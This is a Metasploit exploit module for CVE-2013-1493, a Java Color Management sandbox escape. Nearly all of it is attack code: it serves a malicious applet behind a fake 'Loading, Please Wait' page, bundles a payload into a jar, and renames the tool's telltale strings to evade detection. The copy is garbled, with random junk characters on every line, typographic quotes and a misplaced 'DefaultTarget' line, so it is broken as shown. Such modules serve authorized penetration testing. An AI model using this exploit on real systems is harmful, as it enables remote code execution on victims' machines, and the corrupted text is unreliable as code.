##
0 z* S$ V8 Y: X0 k' v
% z* t+ G O! [1 Z! L5 i+ c# This file is part of the Metasploit Framework and may be subject to
9 \1 N: W4 \8 ~+ `1 w# redistribution and commercial restrictions. Please see the Metasploit
! v! S9 u* S3 C7 e# web site for more information on licensing and terms of use.
) z T& f9 V6 x5 l" W7 E# http://metasploit.com/7 ]; Y; X- [! V4 K
##
" [8 Z. O) P" D. m% _require ‘msf/core’7 G e& h8 }8 L9 f' W8 |& H& A! {
require ‘rex’5 _7 H: I4 @/ u" @7 s! D
class Metasploit3 < Msf::Exploit::Remote; J, w( r0 i. L4 a, P
Rank = NormalRanking
4 T* q' w$ ^2 ?include Msf::Exploit::Remote::HttpServer::HTML- [9 ~" ~* a: ]8 h M! p3 a
include Msf::Exploit::EXE
: f7 @# A, T( | g7 iinclude Msf::Exploit::Remote::BrowserAutopwn3 O4 e, \5 k) I2 [5 x
autopwn_info({ :javascript => false })0 u- s7 s1 ^' P/ o) _* ?9 u
def initialize( info = {} )
- m5 q+ o/ Y& H# ^/ D& _super( update_info( info,7 L, G! w7 C9 W2 B& B$ c/ @6 {
‘Name’ => ‘Java CMM Remote Code Execution’,) q% I+ u1 P5 z. Q
‘Description’ => %q{7 I6 {* f/ w6 U
This module abuses the Color Management classes from a Java Applet to run
: c) {0 o# |: j; r, harbitrary Java code outside of the sandbox as exploited in the wild in February' T& Q/ J( z9 y
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u418 r" r' q3 n+ W( k: Y( [, j
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1- K/ U5 Q7 i% _- l
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java. r5 F' S: n- b6 G/ K# c- k
warning in order to run the malicious applet.
2 t" \; U+ i* C& R" @},
* F) a( T8 X$ A0 G‘License’ => MSF_LICENSE,. g' z) f$ R; F
‘Author’ =>9 n9 F9 C8 x; H3 P
'Unknown', # Vulnerability discovery and Exploit
! ~% F/ J% m/ @'juan vazquez' # Metasploit module (just ported the published exploit)- g. A) Z9 T; g# H
],
" A3 u9 K$ a- p3 p0 I7 C. E* W‘References’ =>
0 a1 x: e9 j$ z2 |# b[( A: b* u' P% L" p0 s1 w
[ 'CVE', '2013-1493' ],4 r* o9 _; T" ]' `5 i9 Z8 Q
[ 'OSVDB', '90737' ],
: Q. h" R! r' ` x2 R[ 'BID', '58238' ],
' H4 c* t, H- K# ~[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ]," g# L# o* n3 c2 f: |; W
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
O0 [ t0 L' ]/ g[ 'URL', 'http://pastie.org/pastes/6581034' ]+ e1 y J* M. h$ M' Q& c0 s; p- L+ Z
],5 d' ^% I$ d E$ y( Z8 U9 ~
‘Platform’ => [ 'win', 'java' ],
8 w: E8 C/ j8 r‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },- \8 E2 \# P4 W7 o2 O) ^& u+ J
‘Targets’ =>
% |1 `% c$ S6 T' ^" `3 o0 u[. L5 U- A4 o3 P
[ 'Generic (Java Payload)',# ]2 ~7 P7 F+ Y1 u) j! }
{) s- U) F* w, A5 J* Y
'Platform' => 'java',3 M# u" m# W1 b5 U8 f. d1 \8 c7 ^& c
'Arch' => ARCH_JAVA4 e6 ~, y6 s9 Y8 c8 d
}
9 q& o% z; h: u% v, w],
; ~" ]* M6 a3 s5 S9 d[ 'Windows x86 (Native Payload)',
- H& p- x% j: r" _4 s, Y9 ^{
+ F- f* s9 {6 j! t9 n'Platform' => 'win',- `. G/ A0 Y E, o, X
'Arch' => ARCH_X867 u: Z# r& ^( f: q& B
}5 H0 f2 H1 _% j+ V) G3 ^
]
7 `. g1 l k$ z],
/ y7 Q8 p& S+ z‘‘DisclosureDate’ => ‘Mar 01 2013′
6 @* ?2 ~( b1 G+ H+ l6 M! L))
/ u, c& X6 }/ N* s" h; jend
0 A3 k; R. E5 ` L5 ^" p- Odef setup
q0 K8 ]2 a! k9 gpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)% b( d: q- ?# F" b$ m% v
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( I& p) Z7 e; R( b: ipath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
3 n) r: n9 F. s# ^& B, q@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }- F$ f2 E7 _. ?6 Z0 T1 S
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)/ X S0 S3 W. B2 X* }
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
, N5 F `, A3 ^5 Zpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)5 G2 B& J3 A+ J% J7 ~& w+ M
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }) t, j4 E7 M" w& t2 t$ O) r
@init_class_name = rand_text_alpha(“Init”.length)7 Z5 ~0 ~8 X" l2 z; M' @( U
@init_class.gsub!(“Init”, @init_class_name)2 q$ a) l% b7 U- t: M& ]. K" ~
super
# I. ]4 [/ L: ^# [end+ h8 Q4 s" y; j" ~5 b
def on_request_uri(cli, request)
, R2 P0 [( O- L Wprint_status(“handling request for #{request.uri}”)! j/ N' |) M" p8 H" q
case request.uri- T/ ]+ a: ? F6 @9 o
when /\.jar$/i+ N/ ]/ A8 h/ x9 c" B( R' M) T
jar = payload.encoded_jar8 W+ A$ n) I/ A9 I4 O- e* w
jar.add_file(“#{@init_class_name}.class”, @init_class)
2 G! O. h" P: w" P/ jjar.add_file(“Leak.class”, @leak_class): m8 W7 }" Y2 X+ d( ]+ A& Y
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
: j% p' H9 ?$ Y" M. y, K- o& h" rjar.add_file(“MyColorSpace.class”, @color_space_class)
9 m$ \5 q7 W x0 y4 aDefaultTarget’ => 1,0 Z: v" m7 R+ m! O- q3 ?. L* }" H1 B
metasploit_str = rand_text_alpha(“metasploit”.length)
1 B. O; A- J+ h9 B" Spayload_str = rand_text_alpha(“payload”.length)
: o" E7 Y; Q. M! X) f9 w& ujar.entries.each { |entry|
. z; _5 B) Y8 \+ {# rentry.name.gsub!(“metasploit”, metasploit_str), q( M/ U( Q( F! A( O% O
entry.name.gsub!(“Payload”, payload_str)& @& N0 t$ e: F, |7 _/ o( B5 f* P! h
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
' a; r# p4 R& W5 q* O/ Z# Tentry.data = entry.data.gsub(“Payload”, payload_str)
6 P; o4 j- l9 m; _}
% p4 T, t$ c9 w6 A5 Y- k9 X: w' |+ zjar.build_manifest0 u- I" g" }, K2 q1 i
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
0 r) S1 x$ L9 ]when /\/$/
/ P& E% @# E8 O% V$ Hpayload = regenerate_payload(cli)1 e" r+ {7 v2 Y1 b& } B: J7 |4 J
if not payload* U+ w; a+ z3 `8 x( t0 `
print_error(“Failed to generate the payload.”): ]& r$ ~8 R9 ?4 W; `; _$ p4 U
send_not_found(cli)
6 Z3 G' O" u. R4 K; L% dreturn
5 b" {6 y2 ^# Y7 X S3 |0 Zend2 Y! G$ T3 ~0 B4 o
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
+ j* A3 Q, T; p1 V5 _else3 I3 \3 U1 W& S& e2 E" E3 B5 q
send_redirect(cli, get_resource() + ‘/’, ”). Q$ P1 C' b$ ~& M* R" X
end
, l, p$ H4 f) E, D& }7 J$ t$ [end! y% G P% T! ?) ?( j
def generate_html
' D+ D; z0 `) E1 b0 P2 Zhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|% _$ y* C% ?- K2 F( f' i7 {
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|1 V, c+ f1 G, @' K
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
+ H! l( j! u* D* u Y. bhtml += %Q|</applet></body></html>|" E; D: k9 L7 |1 `- H9 c0 c
return html
& h( v8 ^2 Y" o7 `end2 d% M+ W# I' ^. u9 T% g
end
) r5 r" Y y8 a, s* {4 h& Nend3 j0 H% r. C' P; Q3 @
|